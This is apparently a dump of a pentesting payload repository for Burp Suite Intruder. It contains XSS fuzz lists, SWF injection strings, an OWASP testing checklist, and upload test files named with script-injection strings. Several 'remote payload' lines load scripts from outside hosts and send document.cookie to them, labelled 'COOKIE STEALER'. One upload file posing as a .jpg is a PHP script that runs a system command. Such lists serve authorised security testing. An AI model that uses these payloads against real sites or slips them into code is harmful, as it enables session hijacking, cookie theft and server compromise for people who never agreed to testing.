XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
4 | INJECTXXXXXXXXXXX "'`();</test>=/* <!-- // #
5 | 
6 | 


--------------------------------------------------------------------------------
/FuzzLists/xss_funny_stored.txt:
--------------------------------------------------------------------------------
1 | <iframe width="560" height="315" src="https://www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1" frameborder="0" allowfullscreen></iframe>
2 | <iframe width="420" height="315" src="https://www.youtube.com/embed/5LlQNty_C8s?autoplay=1" frameborder="0" allowfullscreen></iframe>
3 | <iframe width="420" height="315" src="https://www.youtube.com/embed/iUXAHc-ABoY?autoplay=1" frameborder="0" allowfullscreen></iframe>
4 | <img src="http://38.media.tumblr.com/809d39daf44dd25ef7ce77706e44e953/tumblr_nuvz98USdD1resp2ko1_500.gif"></img>
5 | <img src="http://31.media.tumblr.com/ae3ef754917fe39e9c1fec441c553c85/tumblr_nsa8jqTm7i1resp2ko1_500.gif"></img>
6 | <img src="http://38.media.tumblr.com/tumblr_m5who6JOEM1rna86e.gif"></img>
7 | <img src="http://38.media.tumblr.com/tumblr_ls64yimLuz1r0ix14o1_400.gif"></img>
8 | <img src="https://i.imgur.com/bYmdHcX.gif"></img>
9 | 


--------------------------------------------------------------------------------
/FuzzLists/xss_grep.txt:
--------------------------------------------------------------------------------
 1 | XSS
 2 | INJECTX
 3 | 1111111
 4 | XXXXXXX
 5 | alert(
 6 | prompt(
 7 | onload=
 8 | onerror=
 9 | onmouseover=
10 | location.href=
11 | document.cookie(
12 | crowdshield
13 | <script
14 | 
15 | 


--------------------------------------------------------------------------------
/FuzzLists/xss_payloads_quick.txt:
--------------------------------------------------------------------------------
 1 | javascript:alert(1)//INJECTX
 2 | <svg/onload=alert(1)>//INJECTX
 3 | <img onload=alert(1)>//INJECTX
 4 | <img src=x onerror=prompt(1)>//INJECTX
 5 | <a href="javascript:alert(1)" onmouseover=alert(1)>INJECTX HOVER</a>
 6 |  onmouseover="document.cookie=true;">//INJECTX
 7 | alert(1)>//INJECTX
 8 | <h1>INJECTX</h1>
 9 | <img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>
10 | <svg><script>/<@/>alert(1)</script>//INJECTX
11 | <svg/onload=alert(/INJECTX/)>
12 | <iframe/onload=alert(/INJECTX/)>
13 | <svg/onload=alert`INJECTX`>
14 | <svg/onload=alert(/INJECTX/)>
15 | <svg/onload=alert(`INJECTX`)>
16 | }alert(/INJECTX/);{//
17 | <h1/onclick=alert(1)>a//INJECTX
18 | <svg/onload=alert(/INJECTX/)>
19 | <p/onclick=alert(/INJECTX/)>a
20 | <svg/onload=alert`INJECTX`>
21 | <svg/onload=alert(/INJECTX/)>
22 | <svg/onload=alert(`INJECTX`)>
23 | <video><source onerror="javascript:alert(1)">//INJECTX
24 | <video onerror="javascript:alert(1)"><source>//INJECTX
25 | <audio onerror="javascript:alert(1)"><source>//INJECTX
26 | <input autofocus onfocus=alert(1)>//INJECTX
27 | <select autofocus onfocus=alert(1)>//INJECTX
28 | <textarea autofocus onfocus=alert(1)>//INJECTX
29 | <keygen autofocus onfocus=alert(1)>//INJECTX
30 | <button form=test onformchange=alert(1)>//INJECTX
31 | <form><button formaction="javascript:alert(1)">//INJECTX
32 | <svg onload=(alert)(1) >//INJECTX
33 | <script>$=1,alert($)</script>//INJECTX
34 | <!--<img src="--><img src=x onerror=alert(1)//">//INJECTX
35 | <img/src='x'onerror=alert(1)>//INJECTX
36 | <marguee/onstart=alert(1)>//INJECTX
37 | <script>alert(1)//INJECTX
38 | <script>alert(1)<!--INJECTX
39 | <marquee loop=1 width=0 onfinish=alert(1)>//INJECTX


--------------------------------------------------------------------------------
/FuzzLists/xss_remote_payloads-http.txt:
--------------------------------------------------------------------------------
 1 | <img src=http://sn1persecurity.com/.testing/xss.png>//INJECTX REMOTE
 2 | <iframe src="http://sn1persecurity.com/.testing/xss_vuln.html"></iframe>//INJECTX
 3 | <script src="http://sn1persecurity.com/.testing/xss.js?script_src=1"></script>//INJECTX
 4 | <img src="http://sn1persecurity.com/.testing/xss.png?img_src=2"></img>//INJECTX
 5 | <iframe src="http://sn1persecurity.com/.testing/iframe_injection.php?iframe_src=3" height="100%" width="100%"></iframe>//INJECTX
 6 | <img src="http://sn1persecurity.com/.testing/xss.png?img_src_onerror_prompt" onerror=prompt(1) onload=prompt(2) onmouseover=prompt(3)>//INJECTX
 7 | <img src="http://sn1persecurity.com/.testing/xss.png?img_src_onerror_prompt" onerror=window.location("http://135.23.158.130/.testing/xss.html");>//INJECTX
 8 | <script>location.href='http://sn1persecurity.com/.testing/iframe_injection.php?'+document.cookie;</script>//INJECTX
 9 | <script src="http://sn1persecurity.com/.testing/xss.js?script_src=1"></script>//INJECTX
10 | </script><script src="http://sn1persecurity.com/.testing/xss.js?script_src=1">//INJECTX
11 | <iframe src=http://sn1persecurity.com/.testing/xss_vuln.html onload=prompt(4) onmouseover=alert(5) onerror=prompt(6)><!--//*INJECTX
12 | </textarea><iframe src=http://sn1persecurity.com/.testing/xss_vuln.html onload=prompt(7) onmouseover=alert(8) onerror=prompt(9)><!--//*INJECTX
13 | <font color=red><h1>@INJECTX<iframe src=http://sn1persecurity.com/.testing/xss_vuln.html height=100% width=100% onload=prompt(10) onmouseover=alert(11) onerror=prompt(12)>
14 | <a onclick="javascript:document.location='http://sn1persecurity.com/.testing/iframe_injection.php?cookie='+document.cookie;">INJECTX COOKIE STEALER!</a>
15 | 


--------------------------------------------------------------------------------
/FuzzLists/xss_remote_payloads-https.txt:
--------------------------------------------------------------------------------
 1 | <img src=https://crowdshield.com/.testing/xss.png onerror=prompt(13) onload=prompt(14) onmouseover=prompt(15)>//INJECTX REMOTE
 2 | <iframe src="https://crowdshield.com/.testing/xss_vuln.html"></iframe>//INJECTX
 3 | <script src="https://crowdshield.com/.testing/xss.js?script_src=1"></script>//INJECTX
 4 | <img src="https://crowdshield.com/.testing/xss.png?img_src=2 onerror=prompt(16) onload=prompt(17) onmouseover=prompt(18)"></img>//INJECTX
 5 | <iframe src="https://crowdshield.com/.testing/iframe_injection.php?iframe_src=3" height="0" width="0"></iframe>//INJECTX
 6 | <iframe src="https://crowdshield.com/.testing/iframe_injection.php?iframe_src=4" height="100%" width="100%"></iframe>//INJECTX
 7 | <img src="https://crowdshield.com/.testing/xss.png?img_src_onerror_prompt" onerror=prompt(19) onload=prompt(20) onmouseover=prompt(21)>//INJECTX
 8 | <img src="https://crowdshield.com/.testing/xss.png?img_src_onerror_prompt" onerror=window.location("http://135.23.158.130/.testing/xss.html");>//INJECTX
 9 | <script>location.href='http://sn1persecurity.com/.testing/iframe_injection.php?'+document.cookie;</script>//INJECTX
10 | <script src="https://crowdshield.com/.testing/xss.js?script_src=1"></script>//INJECTX
11 | </script><script src="https://crowdshield.com/.testing/xss.js?script_src=1">//INJECTX
12 | <iframe src=https://crowdshield.com/.testing/xss_vuln.html onload=prompt(22) onmouseover=alert(23) onerror=prompt(24)><!--//*INJECTX
13 | </textarea><iframe src=https://crowdshield.com/.testing/xss_vuln.html onload=prompt(25) onmouseover=alert(26) onerror=prompt(27)><!--//*INJECTX
14 | <font color=red><h1>@INJECTX<iframe src=https://crowdshield.com/.testing/xss_vuln.html height=100% width=100% onload=prompt(28) onmouseover=alert(29) onerror=prompt(30)>
15 | <a onclick="javascript:document.location='https://crowdshield.com/.testing/iframe_injection.php?cookie='+document.cookie;">INJECTX COOKIE STEALER!</a>
16 | 


--------------------------------------------------------------------------------
/FuzzLists/xss_swf_fuzz.txt:
--------------------------------------------------------------------------------
 1 | #getURL,javascript:alert(1)",
 2 | #goto,javascript:alert(1)",	
 3 | ?javascript:alert(1)",
 4 | ?alert(1)",
 5 | ?getURL(javascript:alert(1))",
 6 | ?asfunction:getURL,javascript:alert(1)//",
 7 | ?getURL,javascript:alert(1)",
 8 | ?goto,javascript:alert(1)",		
 9 | ?clickTAG=javascript:alert(1)",
10 | ?url=javascript:alert(1)",
11 | ?clickTAG=javascript:alert(1)&TargetAS=",
12 | ?TargetAS=javascript:alert(1)",
13 | ?skinName=asfunction:getURL,javascript:alert(1)//",
14 | ?baseurl=asfunction:getURL,javascript:alert(1)//",
15 | ?base=javascript:alert(0)",                
16 | ?onend=javascript:alert(1)//",
17 | ?userDefined=');function someFunction(a){}alert(1)//",        
18 | ?URI=javascript:alert(1)",
19 | ?callback=javascript:alert(1)",
20 | ?getURLValue=javascript:alert(1)",
21 | ?goto=javascript:alert(1)",
22 | ?pg=javascript:alert(1)",
23 | ?page=javascript:alert(1)"
24 | ?playerready=alert(document.cookie)
25 | 


--------------------------------------------------------------------------------
/OWASPTestingChecklist_v_1.0.xls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/OWASPTestingChecklist_v_1.0.xls


--------------------------------------------------------------------------------
/Plugins/BurpKit-1.02-pre.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Plugins/BurpKit-1.02-pre.jar


--------------------------------------------------------------------------------
/Plugins/jruby-complete-9.0.0.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Plugins/jruby-complete-9.0.0.0.jar


--------------------------------------------------------------------------------
/Plugins/jython-standalone-2.7.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Plugins/jython-standalone-2.7.0.jar


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ![alt tag](https://github.com/1N3/IntruderPayloads/blob/master/BurpsuiteIntruderPayloads.png)
 2 | 
 3 | # IntruderPayloads
 4 | A collection of Burpsuite Intruder payloads, BurpBounty payloads (https://github.com/wagiro/BurpBounty), fuzz lists and pentesting methodologies. To pull down all 3rd party repos, run install.sh in the same directory of the IntruderPayloads folder.
 5 | 
 6 | Author: xer0dayz@sn1persecurity.com - https://sn1persecurity.com
 7 | 
 8 | ### OWASP TESTING CHECKLIST:
 9 | -----------------------------------------------------------------------
10 | - Spiders, Robots and Crawlers	IG-001
11 | - Search Engine Discovery/Reconnaissance	IG-002
12 | - Identify application entry points	IG-003
13 | - Testing for Web Application Fingerprint	IG-004
14 | - Application Discovery	IG-005
15 | - Analysis of Error Codes	IG-006
16 | - SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness	CM‐001
17 | - DB Listener Testing - DB Listener weak	CM‐002
18 | - Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness	CM‐003
19 | - Application Configuration Management Testing - Application Configuration management weakness	CM‐004
20 | - Testing for File Extensions Handling - File extensions handling	CM‐005
21 | - Old, backup and unreferenced files - Old, backup and unreferenced files	CM‐006
22 | - Infrastructure and Application Admin Interfaces - Access to Admin interfaces	CM‐007
23 | - Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb	CM‐008
24 | - Credentials transport over an encrypted channel - Credentials transport over an encrypted channel	AT-001
25 | - Testing for user enumeration - User enumeration	AT-002
26 | - Testing for Guessable (Dictionary) User Account - Guessable user account	AT-003
27 | - Brute Force Testing - Credentials Brute forcing	AT-004
28 | - Testing for bypassing authentication schema - Bypassing authentication schema	AT-005
29 | - Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset	AT-006
30 | - Testing for Logout and Browser Cache Management - - Logout function not properly implemented, browser cache weakness	AT-007
31 | - Testing for CAPTCHA - Weak Captcha implementation	AT-008
32 | - Testing Multiple Factors Authentication - Weak Multiple Factors Authentication	AT-009
33 | - Testing for Race Conditions - Race Conditions vulnerability	AT-010
34 | - Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token	SM-001
35 | - Testing for Cookies attributes - Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity	SM-002
36 | - Testing for Session Fixation - Session Fixation	SM-003
37 | - Testing for Exposed Session Variables - Exposed sensitive session variables	SM-004
38 | - Testing for CSRF - CSRF	SM-005
39 | - Testing for Path Traversal - Path Traversal	AZ-001
40 | - Testing for bypassing authorization schema - Bypassing authorization schema	AZ-002
41 | - Testing for Privilege Escalation - Privilege Escalation	AZ-003
42 | - Testing for Business Logic - Bypassable business logic	BL-001
43 | - Testing for Reflected Cross Site Scripting - Reflected XSS	DV-001
44 | - Testing for Stored Cross Site Scripting - Stored XSS	DV-002
45 | - Testing for DOM based Cross Site Scripting - DOM XSS	DV-003
46 | - Testing for Cross Site Flashing - Cross Site Flashing	DV-004
47 | - SQL Injection - SQL Injection	DV-005
48 | - LDAP Injection - LDAP Injection	DV-006
49 | - ORM Injection - ORM Injection	DV-007
50 | - XML Injection - XML Injection	DV-008
51 | - SSI Injection - SSI Injection	DV-009
52 | - XPath Injection - XPath Injection	DV-010
53 | - IMAP/SMTP Injection - IMAP/SMTP Injection	DV-011
54 | - Code Injection - Code Injection	DV-012
55 | - OS Commanding - OS Commanding	DV-013
56 | - Buffer overflow - Buffer overflow	DV-014
57 | - Incubated vulnerability - Incubated vulnerability	DV-015
58 | - Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling	DV-016
59 | - Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability	DS-001
60 | - Locking Customer Accounts - Locking Customer Accounts	DS-002
61 | - Testing for DoS Buffer Overflows - Buffer Overflows	DS-003
62 | - User Specified Object Allocation - User Specified Object Allocation	DS-004
63 | - User Input as a Loop Counter - User Input as a Loop Counter	DS-005
64 | - Writing User Provided Data to Disk - Writing User Provided Data to Disk	DS-006
65 | - Failure to Release Resources - Failure to Release Resources	DS-007
66 | - Storing too Much Data in Session - Storing too Much Data in Session	DS-008
67 | - WS Information Gathering - N.A.	WS-001
68 | - Testing WSDL - WSDL Weakness	WS-002
69 | - XML Structural Testing - Weak XML Structure	WS-003
70 | - XML content-level Testing - XML content-level	WS-004
71 | - HTTP GET parameters/REST Testing - WS HTTP GET parameters/REST	WS-005
72 | - Naughty SOAP attachments - WS Naughty SOAP attachments	WS-006
73 | - Replay Testing - WS Replay Testing	WS-007
74 | - AJAX Vulnerabilities - N.A.	AJ-001
75 | - AJAX Testing - AJAX weakness	AJ-002
76 | 
77 | 


--------------------------------------------------------------------------------
/Uploads/":
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/"


--------------------------------------------------------------------------------
/Uploads/" --:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/" --


--------------------------------------------------------------------------------
/Uploads/"><iframe src=" javascript:alert('XSS');">.jpg:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="ISO-8859-1"?>
 2 | <opml version="1.0">
 3 | 	<head>
 4 | 		<title>playlist.xml</title>
 5 | 		<dateCreated>Thu, 27 Jul 2000 03:24:18 GMT</dateCreated>
 6 | 		<dateModified>Fri, 15 Sep 2000 09:01:23 GMT</dateModified>
 7 | 		<ownerName>Dave Winer</ownerName>
 8 | 		<ownerEmail>dave@userland.com</ownerEmail>
 9 | 		<expansionState>1,3,17</expansionState>
10 | 		<vertScrollState>1</vertScrollState>
11 | 		<windowTop>164</windowTop>
12 | 		<windowLeft>50</windowLeft>
13 | 		<windowBottom>672</windowBottom>
14 | 		<windowRight>455</windowRight>
15 | 		</head>
16 | 	<body>
17 | 		<outline text="Background">
18 | 			<outline text="I've started to note the songs I was listening to as I was writing DaveNet pieces. "/>
19 | 			</outline>
20 | 		<outline text="The Last Napster Sunday?">
21 | 			<outline text="Heart of Glass.mp3" type="song" f="Blondie - Heart of Glass.mp3"/>
22 | 			<outline text="Manic Monday.mp3" type="song" f="Bangles - Manic Monday.mp3"/>
23 | 			<outline text="Everybody Have Fun Tonight.mp3" type="song" f="Wang Chung - Everybody Have Fun Tonight.mp3"/>
24 | 			<outline text="She Blinded Me With Science.mp3" type="song" f="Thomas Dolby - She Blinded Me With Science.mp3"/>
25 | 			<outline text="Rivers of Babylon   (HTC).mp3" type="song" f="Jimmy Cliff - Rivers of Babylon   (HTC).mp3"/>
26 | 			<outline text="The Tide Is High.mp3" type="song" f="Blondie - The Tide Is High.mp3"/>
27 | 			<outline text="Back to the Island.mp3" type="song" f="Leon Russell - Back to the Island.mp3"/>
28 | 			<outline text="Lucky Man.mp3" type="song" f="Emerson Lake &amp; Palmer -  Lucky Man.mp3"/>
29 | 			<outline text="Up on Cripple Creek.mp3" type="song" f="The Band - Up on Cripple Creek.mp3"/>
30 | 			<outline text="Crackerbox Palace.mp3" type="song" f="George Harrison - Crackerbox Palace.mp3"/>
31 | 			<outline text="Taxi.Mp3" type="song" f="Harry Chapin - Taxi.Mp3"/>
32 | 			<outline text="Thick As A Brick.mp3" type="song" f="Jethro Tull-Thick As A Brick.mp3"/>
33 | 			<outline text="Riding With the King.mp3" type="song" f="B. B. King &amp; Eric Clapton - Riding With the King - 11 - Hold On Im Coming.mp3"/>
34 | 			</outline>
35 | 		<outline text="The Thrill is Gone?">
36 | 			<outline text="Shaft.MP3" type="song" f="Isaac Hayes - Shaft.MP3"/>
37 | 			<outline text="Superfly.mp3" type="song" f="Curtis Mayfield -- Superfly.mp3"/>
38 | 			<outline text="Rivers of Babylon   (HTC).mp3" type="song" f="Jimmy Cliff - Rivers of Babylon   (HTC).mp3"/>
39 | 			<outline text="The Harder They Come.mp3" type="song" f="Jimmy Cliff - The Harder They Come.mp3"/>
40 | 			<outline text="The Revolution Will Not Be Televised.mp3" type="song" f="Gil Scott Heron - The Revolution Will Not Be Televised.mp3"/>
41 | 			<outline text="The Thrill Is Gone.mp3" type="song" f="BB King -  The Thrill Is  Gone.mp3"/>
42 | 			<outline text="Hit Me with Your Rhythm Stick.mp3" type="song" f="Ian Drury &amp; the Blockheads - Hit Me with Your Rhythm Stick.mp3"/>
43 | 			</outline>
44 | 		</body>
45 | 	</opml>
46 | 
47 | 


--------------------------------------------------------------------------------
/Uploads/"><iframe src=" javascript:alert('XSS');">.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="ISO-8859-1"?>
 2 | <opml version="1.0">
 3 | 	<head>
 4 | 		<title>playlist.xml</title>
 5 | 		<dateCreated>Thu, 27 Jul 2000 03:24:18 GMT</dateCreated>
 6 | 		<dateModified>Fri, 15 Sep 2000 09:01:23 GMT</dateModified>
 7 | 		<ownerName>Dave Winer</ownerName>
 8 | 		<ownerEmail>dave@userland.com</ownerEmail>
 9 | 		<expansionState>1,3,17</expansionState>
10 | 		<vertScrollState>1</vertScrollState>
11 | 		<windowTop>164</windowTop>
12 | 		<windowLeft>50</windowLeft>
13 | 		<windowBottom>672</windowBottom>
14 | 		<windowRight>455</windowRight>
15 | 		</head>
16 | 	<body>
17 | 		<outline text="Background">
18 | 			<outline text="I've started to note the songs I was listening to as I was writing DaveNet pieces. "/>
19 | 			</outline>
20 | 		<outline text="The Last Napster Sunday?">
21 | 			<outline text="Heart of Glass.mp3" type="song" f="Blondie - Heart of Glass.mp3"/>
22 | 			<outline text="Manic Monday.mp3" type="song" f="Bangles - Manic Monday.mp3"/>
23 | 			<outline text="Everybody Have Fun Tonight.mp3" type="song" f="Wang Chung - Everybody Have Fun Tonight.mp3"/>
24 | 			<outline text="She Blinded Me With Science.mp3" type="song" f="Thomas Dolby - She Blinded Me With Science.mp3"/>
25 | 			<outline text="Rivers of Babylon   (HTC).mp3" type="song" f="Jimmy Cliff - Rivers of Babylon   (HTC).mp3"/>
26 | 			<outline text="The Tide Is High.mp3" type="song" f="Blondie - The Tide Is High.mp3"/>
27 | 			<outline text="Back to the Island.mp3" type="song" f="Leon Russell - Back to the Island.mp3"/>
28 | 			<outline text="Lucky Man.mp3" type="song" f="Emerson Lake &amp; Palmer -  Lucky Man.mp3"/>
29 | 			<outline text="Up on Cripple Creek.mp3" type="song" f="The Band - Up on Cripple Creek.mp3"/>
30 | 			<outline text="Crackerbox Palace.mp3" type="song" f="George Harrison - Crackerbox Palace.mp3"/>
31 | 			<outline text="Taxi.Mp3" type="song" f="Harry Chapin - Taxi.Mp3"/>
32 | 			<outline text="Thick As A Brick.mp3" type="song" f="Jethro Tull-Thick As A Brick.mp3"/>
33 | 			<outline text="Riding With the King.mp3" type="song" f="B. B. King &amp; Eric Clapton - Riding With the King - 11 - Hold On Im Coming.mp3"/>
34 | 			</outline>
35 | 		<outline text="The Thrill is Gone?">
36 | 			<outline text="Shaft.MP3" type="song" f="Isaac Hayes - Shaft.MP3"/>
37 | 			<outline text="Superfly.mp3" type="song" f="Curtis Mayfield -- Superfly.mp3"/>
38 | 			<outline text="Rivers of Babylon   (HTC).mp3" type="song" f="Jimmy Cliff - Rivers of Babylon   (HTC).mp3"/>
39 | 			<outline text="The Harder They Come.mp3" type="song" f="Jimmy Cliff - The Harder They Come.mp3"/>
40 | 			<outline text="The Revolution Will Not Be Televised.mp3" type="song" f="Gil Scott Heron - The Revolution Will Not Be Televised.mp3"/>
41 | 			<outline text="The Thrill Is Gone.mp3" type="song" f="BB King -  The Thrill Is  Gone.mp3"/>
42 | 			<outline text="Hit Me with Your Rhythm Stick.mp3" type="song" f="Ian Drury &amp; the Blockheads - Hit Me with Your Rhythm Stick.mp3"/>
43 | 			</outline>
44 | 		</body>
45 | 	</opml>
46 | 
47 | 


--------------------------------------------------------------------------------
/Uploads/"><img onload=prompt(1)>.cfg:
--------------------------------------------------------------------------------
1 | "><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>
2 | 


--------------------------------------------------------------------------------
/Uploads/"><img onload=prompt(1)>.csv:
--------------------------------------------------------------------------------
1 | test	test	test	<script>alert(1)</script>
2 | 


--------------------------------------------------------------------------------
/Uploads/"><img onload=prompt(1)>.docx:
--------------------------------------------------------------------------------
1 | "><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>
2 | 


--------------------------------------------------------------------------------
/Uploads/"><img onload=prompt(1)>.img:
--------------------------------------------------------------------------------
1 | test	test	test	<script>alert(1)</script>
2 | 


--------------------------------------------------------------------------------
/Uploads/"><img onload=prompt(1)>.torrent:
--------------------------------------------------------------------------------
1 | test	test	test	<script>alert(1)</script>
2 | 


--------------------------------------------------------------------------------
/Uploads/"><img onload=prompt(1)>.zip:
--------------------------------------------------------------------------------
1 | test	test	test	<script>alert(1)</script>
2 | 


--------------------------------------------------------------------------------
/Uploads/"><img onload=prompt(1)>2.csv:
--------------------------------------------------------------------------------
1 | "><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>
2 | 


--------------------------------------------------------------------------------
/Uploads/"><img onload=prompt(1)>2.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/"><img onload=prompt(1)>2.docx


--------------------------------------------------------------------------------
/Uploads/"><img src=x onload=prompt(1)>.jpg:
--------------------------------------------------------------------------------
1 | <?php
2 | system("uname -a");
3 | phpinfo();
4 | ?>
5 | 


--------------------------------------------------------------------------------
/Uploads/"><svg onload=alert(1)>.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/"><svg onload=alert(1)>.jpg


--------------------------------------------------------------------------------
/Uploads/%00';alert(1);.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%00';alert(1);.jpg


--------------------------------------------------------------------------------
/Uploads/%00';alert(2);.jpg:
--------------------------------------------------------------------------------
